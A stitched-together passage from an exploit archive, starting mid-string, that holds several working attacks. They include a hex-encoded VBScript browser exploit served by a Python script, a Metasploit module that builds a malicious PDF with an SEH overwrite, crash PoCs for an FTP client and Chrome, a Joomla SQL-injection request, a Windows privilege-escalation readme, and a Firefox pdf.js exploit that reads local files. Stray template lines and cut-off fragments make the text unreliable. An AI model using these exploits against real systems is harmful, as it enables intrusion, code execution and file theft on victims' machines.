"\x69\x3d\x6d\x79\x64\x61\x74\x61\x28\x29\x20\x20\x0d\x0a\x20\x20\x20\x20\x69\x3d\x72\x75\x6d\x28" "\x69\x2b\x38\x29\x0d\x0a\x20\x20\x20\x20\x69\x3d\x72\x75\x6d\x28\x69\x2b\x31\x36\x29\x0d\x0a\x20" "\x20\x20\x20\x6a\x3d\x72\x75\x6d\x28\x69\x2b\x26\x68\x31\x33\x34\x29\x20\x20\x0d\x0a\x20\x20\x20" "\x20\x66\x6f\x72\x20\x6b\x3d\x30\x20\x74\x6f\x20\x26\x68\x36\x30\x20\x73\x74\x65\x70\x20\x34\x0d" "\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x6a\x3d\x72\x75\x6d\x28\x69\x2b\x26\x68\x31\x32\x30\x2b\x6b" "\x29\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x28\x6a\x3d\x31\x34\x29\x20\x74\x68\x65\x6e" "\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6a\x3d\x30\x20\x20\x20\x20\x20" "\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x64" "\x69\x6d\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x32\x29\x20\x20\x20\x20\x20" "\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x61\x61\x28\x61\x31\x2b\x32\x29\x28" "\x69\x2b\x26\x68\x31\x31\x63\x2b\x6b\x29\x3d\x61\x62\x28\x34\x29\x0d\x0a\x20\x20\x20\x20\x20\x20" "\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20" "\x61\x61\x28\x61\x30\x29\x20\x20\x0d\x0a\x20\x0d\x0a\x20\x20\x20\x20\x20\x6a\x3d\x30\x20\x0d\x0a" "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6a\x3d\x72\x75\x6d\x28\x69\x2b\x26\x68" "\x31\x32\x30\x2b\x6b\x29\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20" "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x45\x78\x69\x74\x20\x66\x6f\x72\x0d\x0a" "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6e\x64\x20\x69\x66\x0d\x0a\x20\x0d\x0a\x20\x20" "\x20\x20\x6e\x65\x78\x74\x20\x0d\x0a\x20\x20\x20\x20\x61\x62\x28\x32\x29\x3d\x31\x2e\x36\x39\x37" "\x35\x39\x36\x36\x33\x33\x31\x36\x37\x34\x37\x45\x2d\x33\x31\x33\x0d\x0a\x20\x20\x20\x20\x72\x75" "\x6e\x6d\x75\x6d\x61\x61\x28\x29\x20\x0d\x0a\x65\x6e\x64\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x0d" "\x0a\x20\x0d\x0a\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x4f\x76\x65\x72\x28\x29\x0d\x0a\x20\x20\x20" "\x20\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x20" "\x20\x20\x20\x64\x69\x6d\x20\x74\x79\x70\x65\x31\x2c\x74\x79\x70\x65\x32\x2c\x74\x79\x70\x65\x33" "\x0d\x0a\x20\x20\x20\x20\x4f\x76\x65\x72\x3d\x46\x61\x6c\x73\x65\x0d\x0a\x20\x20\x20\x20\x61\x30" "\x3d\x61\x30\x2b\x61\x33\x0d\x0a\x20\x20\x20\x20\x61\x31\x3d\x61\x30\x2b\x32\x0d\x0a\x20\x20\x20" "\x20\x61\x32\x3d\x61\x30\x2b\x26\x68\x38\x30\x30\x30\x30\x30\x30\x0d\x0a\x20\x20\x20\x0d\x0a\x20" "\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x30" "\x29\x20\x0d\x0a\x20\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x20\x20\x61\x62\x28\x61\x30\x29\x20\x20" "\x20\x20\x20\x0d\x0a\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x20\x50\x72\x65" "\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x32\x29\x0d\x0a\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x74" "\x79\x70\x65\x31\x3d\x31\x0d\x0a\x20\x20\x20\x20\x61\x62\x28\x30\x29\x3d\x31\x2e\x31\x32\x33\x34" "\x35\x36\x37\x38\x39\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x30\x31\x32\x33\x34\x35\x36\x37\x38" "\x39\x30\x0d\x0a\x20\x20\x20\x20\x61\x61\x28\x61\x30\x29\x3d\x31\x30\x0d\x0a\x20\x20\x20\x20\x20" "\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x49\x66\x28\x49\x73\x4f\x62\x6a\x65\x63\x74\x28" "\x61\x61\x28\x61\x31\x2d\x31\x29\x29\x20\x3d\x20\x46\x61\x6c\x73\x65\x29\x20\x54\x68\x65\x6e\x0d" "\x0a\x20\x20\x20\x20\x20\x20\x20\x69\x66\x28\x69\x6e\x74\x56\x65\x72\x73\x69\x6f\x6e\x3c\x34\x29" "\x20\x74\x68\x65\x6e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6d\x65\x6d\x3d\x63\x69" "\x6e\x74\x28\x61\x30\x2b\x31\x29\x2a\x31\x36\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" "\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6a\x3d\x76\x61\x72\x74\x79\x70\x65\x28\x61" "\x61\x28\x61\x31\x2d\x31\x29\x29\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x28" "\x28\x6a\x3d\x6d\x65\x6d\x2b\x34\x29\x20\x6f\x72\x20\x28\x6a\x2a\x38\x3d\x6d\x65\x6d\x2b\x38\x29" "\x29\x20\x74\x68\x65\x6e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66" "\x28\x76\x61\x72\x74\x79\x70\x65\x28\x61\x61\x28\x61\x31\x2d\x31\x29\x29\x3c\x3e\x30\x29\x20\x20" "\x54\x68\x65\x6e\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" "\x20\x20\x20\x49\x66\x28\x49\x73\x4f\x62\x6a\x65\x63\x74\x28\x61\x61\x28\x61\x31\x29\x29\x20\x3d" "\x20\x46\x61\x6c\x73\x65\x20\x29\x20\x54\x68\x65\x6e\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" "\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x74" "\x79\x70\x65\x31\x3d\x56\x61\x72\x54\x79\x70\x65\x28\x61\x61\x28\x61\x31\x29\x29\x0d\x0a\x20\x20" "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6e\x64\x20\x69\x66\x20\x20\x20" "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" "\x20\x20\x20\x20\x65\x6e\x64\x20\x69\x66\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65" "\x6c\x73\x65\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x64\x69\x6d\x20" "\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x30\x29\x0d\x0a\x20\x20\x20\x20\x20\x20" "\x20\x20\x20\x20\x20\x20\x20\x65\x78\x69\x74\x20\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x0d\x0a\x20" "\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6e\x64\x20\x69\x66\x20\x0d\x0a\x20\x20" "\x20\x20\x20\x20\x20\x20\x65\x6c\x73\x65\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69" "\x66\x28\x76\x61\x72\x74\x79\x70\x65\x28\x61\x61\x28\x61\x31\x2d\x31\x29\x29\x3c\x3e\x30\x29\x20" "\x20\x54\x68\x65\x6e\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" "\x20\x49\x66\x28\x49\x73\x4f\x62\x6a\x65\x63\x74\x28\x61\x61\x28\x61\x31\x29\x29\x20\x3d\x20\x46" "\x61\x6c\x73\x65\x20\x29\x20\x54\x68\x65\x6e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" "\x20\x20\x20\x20\x20\x20\x20\x74\x79\x70\x65\x31\x3d\x56\x61\x72\x54\x79\x70\x65\x28\x61\x61\x28" "\x61\x31\x29\x29\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6e\x64\x20" "\x69\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20" "\x20\x20\x20\x20\x20\x20\x20\x65\x6e\x64\x20\x69\x66\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x65" "\x6e\x64\x20\x69\x66\x0d\x0a\x20\x20\x20\x20\x65\x6e\x64\x20\x69\x66\x0d\x0a\x20\x20\x20\x20\x20" "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x49" "\x66\x28\x74\x79\x70\x65\x31\x3d\x26\x68\x32\x66\x36\x36\x29\x20\x54\x68\x65\x6e\x20\x20\x20\x20" "\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x4f\x76\x65\x72\x3d\x54\x72" "\x75\x65\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x45\x6e\x64\x20\x49\x66\x20\x20\x0d\x0a" "\x20\x20\x20\x20\x49\x66\x28\x74\x79\x70\x65\x31\x3d\x26\x68\x42\x39\x41\x44\x29\x20\x54\x68\x65" "\x6e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x4f\x76\x65\x72\x3d\x54\x72\x75\x65\x0d\x0a" "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x77\x69\x6e\x39\x78\x3d\x31\x0d\x0a\x20\x20\x20\x20\x45" "\x6e\x64\x20\x49\x66\x20\x20\x0d\x0a\x20\x0d\x0a\x20\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x20\x50" "\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x30\x29\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" "\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x65\x6e\x64\x20\x66\x75\x6e\x63\x74\x69\x6f" "\x6e\x0d\x0a\x20\x0d\x0a\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x72\x75\x6d\x28\x61\x64\x64\x29\x20" "\x0d\x0a\x20\x20\x20\x20\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65" "\x78\x74\x0d\x0a\x20\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20" "\x61\x61\x28\x61\x32\x29\x20\x20\x0d\x0a\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x61\x62\x28\x30\x29" "\x3d\x30\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x61\x61\x28\x61\x31\x29\x3d\x61\x64\x64\x2b\x34\x20" "\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x61\x62\x28\x30\x29\x3d\x31\x2e\x36\x39\x37\x35\x39\x36" "\x36\x33\x33\x31\x36\x37\x34\x37\x45\x2d\x33\x31\x33\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20" "\x20\x20\x72\x75\x6d\x3d\x6c\x65\x6e\x62\x28\x61\x61\x28\x61\x31\x29\x29\x20\x20\x0d\x0a\x20\x20" "\x20\x20\x0d\x0a\x20\x20\x20\x20\x61\x62\x28\x30\x29\x3d\x30\x0d\x0a\x20\x20\x20\x20\x72\x65\x64" "\x69\x6d\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x30\x29\x0d\x0a\x65\x6e\x64" "\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x0d\x0a\x20\x0d\x0a\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e\x0d" "\x0a\x20\x0d\x0a\x3c\x2f\x62\x6f\x64\x79\x3e\x0d\x0a\x3c\x2f\x68\x74\x6d\x6c\x3e") hesam="HTTP/1.1 200 OK\n"+"Content-Type: text/html\n"+"\n"+hesam http_response = hesam.replace("FILE_DOWNLOAD","http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe")#exe link client_connection.sendall(http_response) client_connection.close()
HireHackking

PDF Shaper 3.5 - Local Buffer Overflow (Metasploit)

HACKER · %s · %s

## # This module requires Metabuffer: http://metabuffer.com/download # Current source: https://github.com/rapid7/metabuffer-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote #Rank definition: http://dev.metabuffer.com/redmine/projects/framework/wiki/Exploit_Ranking #ManualRanking/LowRanking/AverageRanking/NormalRanking/GoodRanking/GreatRanking/ExcellentRanking Rank = NormalRanking include Msf::Exploit::FILEFORMAT include Msf::Exploit::PDF include Msf::Exploit::Seh def initialize(info = {}) super(update_info(info, 'Name' => 'PDF Shaper Buffer Overflow', 'Description' => %q{ PDF Shaper is prone to a security vulnerability when processing PDF files. The vulnerability appear when we use Convert PDF to Image and use a specially crafted PDF file. This module has been tested successfully on Win Xp, Win 7, Win 8, Win 10. }, 'License' => MSF_LICENSE, 'Author' => [ 'metacom<metacom27[at]gmail.com>', # Original discovery 'metacom', # MSF Module ], 'References' => [ [ 'OSVDB', '<insert OSVDB number here>' ], [ 'CVE', 'insert CVE number here' ], [ 'URL', '<insert another link to the exploit/advisory here>' ] ], 'DefaultOptions' => { 'ExitFunction' => 'process', #none/process/thread/seh #'InitialAutoRunScript' => 'migrate -f', }, 'Platform' => 'win', 'Payload' => { 'Space' => 2000, 'DisableNops' => true, }, 'Targets' => [ [ '<Win Xp, Win 7, Win 8, Win 10 / PDF Shaper v.3.5>', { 'Ret' => 0x00713726, # pop ebx # pop ebp # ret - PDFTools.exe 'Offset' => 433 } ], ], 'Privileged' => false, #Correct Date Format: "M D Y" #Month format: Jan,Feb,Mar,Apr,May,Jun,Jul,Aug,Sep,Oct,Nov,Dec 'DisclosureDate' => 'Aug 10 2015', 'DefaultTarget' => 0)) register_options([OptString.new('FILENAME', [ false, 'The file name.', 'msf.pdf']),], self.class) end def exploit file_create(make_pdf) end def jpeg buffer = "\xFF\xD8\xFF\xEE\x00\x0E\x41\x64\x6F\x62\x65\x00\x64\x80\x00\x00" buffer << "\x00\x02\xFF\xDB\x00\x84\x00\x02\x02\x02\x02\x02\x02\x02\x02\x02" buffer << "\x02\x03\x02\x02\x02\x03\x04\x03\x03\x03\x03\x04\x05\x04\x04\x04" buffer << "\x04\x04\x05\x05\x05\x05\x05\x05\x05\x05\x05\x05\x07\x08\x08\x08" buffer << "\x07\x05\x09\x0A\x0A\x0A\x0A\x09\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C" buffer << "\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x01\x03\x02\x02\x03\x03\x03\x07\x05" buffer << "\x05\x07\x0D\x0A\x09\x0A\x0D\x0F\x0D\x0D\x0D\x0D\x0F\x0F\x0C\x0C" buffer << "\x0C\x0C\x0C\x0F\x0F\x0C\x0C\x0C\x0C\x0C\x0C\x0F\x0C\x0E\x0E\x0E" buffer << "\x0E\x0E\x0C\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11" buffer << "\x11\x11\x11\x11\x11\x11\x11\x11\xFF\xC0\x00\x14\x08\x00\x32\x00" buffer << "\xE6\x04\x01\x11\x00\x02\x11\x01\x03\x11\x01\x04\x11\x00\xFF\xC4" buffer << "\x01\xA2\x00\x00\x00\x07\x01\x01\x01\x01\x01\x00\x00\x00\x00\x00" buffer << "\x00\x00\x00\x04\x05\x03\x02\x06\x01\x00\x07\x08\x09\x0A\x0B\x01" buffer << "\x54\x02\x02\x03\x01\x01\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00" buffer << "\x01\x00\x02\x03\x04\x05\x06\x07" buffer << rand_text(target['Offset']) #junk buffer << generate_seh_record(target.ret) buffer << payload.encoded buffer << rand_text(2388 - payload.encoded.length) return buffer end def nObfu(str) return str end def make_pdf # pdf template taken from PDF Shaper exploit module @pdf << header add_object(1, nObfu("<</Type/Catalog/Outlines 2 0 R /Pages 3 0 R>>")) add_object(2, nObfu("<</Type/Outlines>>")) add_object(3, nObfu("<</Type/Pages/Kids[5 0 R]/Count 1/Resources <</ProcSet 4 0 R/XObject <</I0 7 0 R>>>>/MediaBox[0 0 612.0 792.0]>>")) add_object(4, nObfu("[/PDF/Text/ImageC]")) add_object(5, nObfu("<</Type/Page/Parent 3 0 R/Contents 6 0 R>>")) stream_1 = "stream" << eol stream_1 << "0.000 0.000 0.000 rg 0.000 0.000 0.000 RG q 265.000 0 0 229.000 41.000 522.000 cm /I0 Do Q" << eol stream_1 << "endstream" << eol add_object(6, nObfu("<</Length 91>>#{stream_1}")) stream = "<<" << eol stream << "/Width 230" << eol stream << "/BitsPerComponent 8" << eol stream << "/Name /X" << eol stream << "/Height 50" << eol stream << "/Intent /RelativeColorimetric" << eol stream << "/Subtype /Image" << eol stream << "/Filter /DCTDecode" << eol stream << "/Length #{jpeg.length}" << eol stream << "/ColorSpace /DeviceCMYK" << eol stream << "/Type /XObject" << eol stream << ">>" stream << "stream" << eol stream << jpeg << eol stream << "endstream" << eol add_object(7, stream) finish_pdf end end
HireHackking

NetServe FTP Client 1.0 - Local Denial of Service

HACKER · %s · %s

******************************************************************************************** # Exploit Title: NetServe FTP Client 1.0 DOS (Overflow). # Date: 8/12/2015 # Exploit Author: Un_N0n # Software Link: http://netserve-ftp-client.en.softonic.com/ # Version: Version 1.0.0 # Tested on: Windows 7 x64(64 BIT) ******************************************************************************************** [Steps to Produce the Crash]: 1- Open up NetServeFTPClient.exe 2- Click on 'Site List'. 3- Select any Directory and Click on NEW. 4- In the Fields like NAME, FTP_PATH, Username, Password Paste in the Junk Produced by PY script given Below. Program will crash saying 'Run Time Error (6), Overflow'. [Reason?] Acc to MSDN:"An overflow results when you try to make an assignment that exceeds the limitations of the target of the assignment." REF for More Info: https://msdn.microsoft.com/en-us/library/aa264525(v=vs.60).aspx [Code to produce evil bleh.txt ;)]: data = "\x41" * 8000 file = open("bleh.txt","w") file.write(data) file.close() [Link for Software: ] http://netserve-ftp-client.esoftfinder.com/download/ **********************************************************************************************************************************************
HireHackking

Google Chrome 43.0 - Certificate MIME Handling Integer Overflow

HACKER · %s · %s

#!/usr/bin/python2 import socket import sys import time kHost = '127.0.0.1' kPort = 443 def bind_listen(): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT, 1) s.bind((kHost, kPort)) s.listen(1) return s def send_certificate(c, r): print '[*] sending certificate' payload = '' with open('compressed', 'rb') as tmp: payload = tmp.read() c.send('HTTP/1.1 200 OK\r\n') c.send('Content-Type: application/x-x509-user-cert\r\n') c.send('Content-Encoding: gzip\r\n') c.send('Content-Length: {}\r\n'.format(len(payload))) c.send('\r\n') c.send(payload) def main(): print '[*] listening for connection on port {}:{}'.format(kHost, kPort) s = bind_listen() while True: c, (host, port) = s.accept() print '[*] connection from {}:{}'.format(host, port) while True: r = c.recv(1024) if 'favicon' in r: c.send('HTTP/1.1 404 Not Found\r\n\r\n') else: send_certificate(c, r) time.sleep(20) sys.exit(0) if __name__ == '__main__': main() Thanks, Paulos Yibelo
HireHackking

Joomla! Component com_jem 2.1.4 - Multiple Vulnerabilities

HACKER · %s · %s

# Exploit Title: Joomla Event Manager 2.1.4 - Multiple Vulnerabilities # Google Dork: inurl:option=com_jem # Date: 08-12-2015 # Author: Martino Sani # Vendor Homepage: www.joomlaeventmanager.net # Software Link: www.joomlaeventmanager.net/download?download=50:jem-2-1-4-stable # Version: 2.1.4 # CVE: - # VULNERABILITIES ##1 SQL Injection Resource: index.php?option=com_jem&view=myevents Parameter: cid Authenticated user can execute arbitrary SQL queries via SQL injection in the functionality that allows to publish/unpublish an event. ### Source Code File: sites/models/myevents.php function publish($cid = array(), $publish = 1) { if (is_array($cid) && count($cid)) { $cids = implode(',', $cid); $query = 'UPDATE #__jem_events' . ' SET published = '. (int) $publish . ' WHERE id IN ('. $cids .')' . ' AND (checked_out = 0 OR (checked_out = ' .$userid. '))'; $this->_db->setQuery($query); } } ### PoC POST /joomla3.4.3/index.php?option=com_jem&view=myevents&Itemid=151 HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1/joomla3.4.3/index.php?option=com_jem&view=myevents&Itemid=151 Cookie: 55cfbe406ffe44b0159d9a943820d207=gauuoq0rqlakkltqj4dd1mpd76; jpanesliders_stat-pane=0; jpanesliders_event-sliders-10=2; d6300469df4ad94ccc019d02bc74f647=4339lu3g2tn4lhg2lvgd8ft263 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 352 filter=1&filter_search=&limit=10&cid%5B%5D=1,2)%20AND%20(SELECT%206959%20FROM(SELECT%20COUNT(*),CONCAT(VERSION(),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20AND%20(1577=1577&filter_order=a.dates&filter_order_Dir=&enableemailaddress=0&boxchecked=1&task=myevents.unpublish&option=com_jem&5c597c6e06b1d6627024f147b562ecaf=1 ------------------------------------------------------------------------------------------- ##2 Insecure File Upload Default JEM settings allows to upload HTML/HTM files as event's attachment. An authenticated attacker could upload malicious HTML/HTM files with malicious code (e.g. Javascript). These attachments could be reachable on "<website>/media/com_jem/attachments/event/event[id]/" or downloaded and executed locally by the victim's browser. Attachments process is handled by "/site/classes/attachments.class.php" file. File types allowed by default are in the "/admin/sql/install.mysql.utf.sql" file. ------------------------------------------------------------------------------------------- # NOTES 08-01-2015: Vendor notification. 08-12-2015: Vendor fixes the issues in the development branch. The author is not responsible for the misuse of the information provided in this security advisory.
HireHackking
Source: https://github.com/monoxgas/Trebuchet Trebuchet MS15-076 (CVE-2015-2370) Privilege Escalation Copies a file to any privileged location on disk Compiled with VS2015, precompiled exe in Binary directory Usage: trebuchet.exe C:\Users\Bob\Evil.txt C:\Windows\System32\Evil.dll This is a lightly modified Proof of Concept by James Forshaw with Google, found here: https://code.google.com/p/google-security-research/issues/detail?id=325 CreateSymlink tool was written by James Forshaw found here: https://github.com/google/symboliclink-testing-tools Notes: Microsoft.VisualStudio.OLE.Inerop.dll must be in the same directory Exploit can only be one once every 2-3 minutes. This is because RPC can be help up by LocalSystem Tested on x64/x86 Windows 7/8.1 Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37768.zip
HireHackking

Mozilla Firefox < 39.03 - 'pdf.js' Same Origin Policy

HACKER · %s · %s

/* # Exploit Title: Firefox < 39.03 pdf.js same origin policy exploit # Date: 13-08-2014 # Vendor Homepage: https://www.mozilla.org/en-US/firefox/new/ # Software Link: http://ftp.mozilla.org/pub/firefox/releases/39.0/linux-x86_64/en-US/firefox-39.0.tar.bz2 # Version: 39.0 [Should work version before 39.0.3] # Tested on: Linux (Ubuntu 14.04.3 LTS) [Should probably work in OSX] # CVE : 2015-4495 # POC code taken from https://github.com/vincd/CVE-2015-4495 1. Description This exploit allow attacker to read and copy information on victim's computer, once they view the web site crafted with this exploit. 2. Proof of Concept Create a index.html and copy and paste the following html into it: <!DOCTYPE html> <html> <head> <title>CVE-2015-4495</title> </head> <body> <h1>Test</h1> <script type="text/javascript" src="./exploit.js" charset="utf-8"></script> </body> </html> Run the index.html (Make sure the main.js is in the same directory) and we should be able to see the directory listing. 3. Solution Upgrade to the latest firefox ( > 39.0.3) */ var start_timeout=2000; var sandbox_context_i=null; var DIR_CACHE={}; var FILE_CACHE={}; var hidden=true; var my_win_id=null; function start() { i=document.getElementById("i"); i2=document.getElementById("i2"); if(typeof sandboxContext!=='undefined') { clearInterval(intVal); var os = navigator.platform; if (os.search("Mac") > -1 || os.search("Linux") > -1) { // NOTE: Replace the following root directory into any directory of your // choice. Can make it an array and loop through it. get_dir("/", function(data) { // nothing to do here... }); } } } function parse_directory_listing(dir, data) { var pattern = '<tbody><tr><td><a class='; var start = 0; var listing = 'Listing:\n'; while ((start = data.search(pattern)) >= 0) { var d = data.substring(start + pattern.length + 1), end = d.search('>'), f = d.substring(0, end); f = f.split(' '); var t = f[0].substring(0, f[0].length-1); var n = f[1].substring(6, f[1].length-1); listing += ' [' + t + '] ' + dir + '/' + n + '\n'; data = d.substring(end); } // NOTE: Replace with some other useful stuff. Eg: Read the file and do a post // request to send all the content to a remote server. alert(listing); } function get_dir(dir,callback,internal) { get(dir,function() { data=get_data(this); var dir=location.href.toString(); dir=dir.replace(/^file\:\/\//i,''); dir=decodeURIComponent(dir); parse_directory_listing(dir, data); }, 500, "%target_dir%", dir); } function xml2string(obj) { return new XMLSerializer().serializeToString(obj); } function _(s,template,value) { s=s.toString().split(/^\s*function\s+\(\s*\)\s*\{/)[1]; s=s.substring(0,s.length-1); if(template&&value) s=s.replace(template,value); s+=parse_directory_listing; s+=__proto; s+=xml2string; s+=get_data; s=s.replace(/\s\/\/.*\n/g,""); s=s+";undefined"; return s; } function __proto(obj) { return obj.__proto__.__proto__.__proto__.__proto__.__proto__.__proto__; } function get_data(obj) { data=null; try { data=obj.document.documentElement.innerHTML; if (data.indexOf('dirListing') < 0) { throw new Error(); } } catch(e) { if (this.document instanceof XMLDocument) { data=xml2string(this.document); } else { try { if (this.document.body.firstChild.nodeName.toUpperCase()=='PRE') { data=this.document.body.firstChild.textContent; } else { throw new Error(); } } catch(e) { try { if (this.document.body.baseURI.indexOf('pdf.js') >= 0 || data.indexOf('aboutNetError') >- 1 ) { return null; } else { throw new Error(); } } catch(e) { ; } } } } return data; } function get(path,callback,timeout,template,value){ callback = _(callback); if(template && value) callback = callback.replace(template,value); proto_prefix="file://"; var invisible_code=""; js_call1='javascript:'+invisible_code+_(function(){ try { open("%url%","_self"); } catch(e) { history.back(); } undefined; }, "%url%", proto_prefix+path); js_call2='javascript:' + invisible_code + ';try{updateHidden();}catch(e){};' + callback + ';undefined'; sandboxContext(_(function() { p = __proto(i.contentDocument.styleSheets[0].ownerNode); l = p.__lookupSetter__.call(i2.contentWindow,'location'); l.call(i2.contentWindow, window.wrappedJSObject.js_call1); })); setTimeout((function() { sandboxContext(_(function() { p = __proto(i.contentDocument.styleSheets[0].ownerNode); l = p.__lookupSetter__.call(i2.contentWindow,'location'); l.call(i2.contentWindow,window.wrappedJSObject.js_call2); })); }), timeout); } function get_sandbox_context() { if(my_win_id==null) { for(var i=0;i<20;i++) { try { if(window[i].location.toString().indexOf("view-source:")!=-1) { my_win_id=i;;break; } } catch(e) {} } }; if(my_win_id==null) return; clearInterval(sandbox_context_i); object.data='view-source:' + blobURL; window[my_win_id].location='data:application/x-moz-playpreview-pdfjs;,'; object.data='data:text/html,<html/>'; window[my_win_id].frameElement.insertAdjacentHTML('beforebegin', '<iframe onload="' + _(function() { window.wrappedJSObject.sandboxContext = (function(cmd) { with(importFunction.constructor('return this')()) { return eval(cmd); } }); }) + '"/>'); } function setup_plugin() { var i = document.createElement("iframe"); i.id = "i"; i.width = 1; i.height = 1; i.src = "data:application/xml,<" + "?xml version=\"1.0\"?><e><e1></e1></e>"; i.frameBorder = 0; document.documentElement.appendChild(i); i.onload=function() { if(this.contentDocument.styleSheets.length>0) { var i2 = document.createElement("iframe"); i2.id="i2"; i2.src="data:application/pdf,"; i2.frameBorder=0; if(!hidden) { i2.width="100%"; i2.height="700px"; } else { i2.width=1; i2.height=1; } document.documentElement.appendChild(i2); pdfBlob=new Blob([''], { type:'application/pdf' }); blobURL = URL.createObjectURL(pdfBlob); object = document.createElement('object'); object.data='data:application/pdf,'; if(hidden) { object.style.display='none'; object.width=1; object.height=1; } object.onload = (function() { sandbox_context_i = setInterval(get_sandbox_context,200); object.onload=null; object.data='view-source:' + location.href;return; }); document.documentElement.appendChild(object); } else { this.contentWindow.location.reload(); } } } setTimeout(function() { setup_plugin(); intVal = setInterval(start, 150); }, start_timeout);
HireHackking

Joomla! Component com_memorix - SQL Injection

HACKER · %s · %s
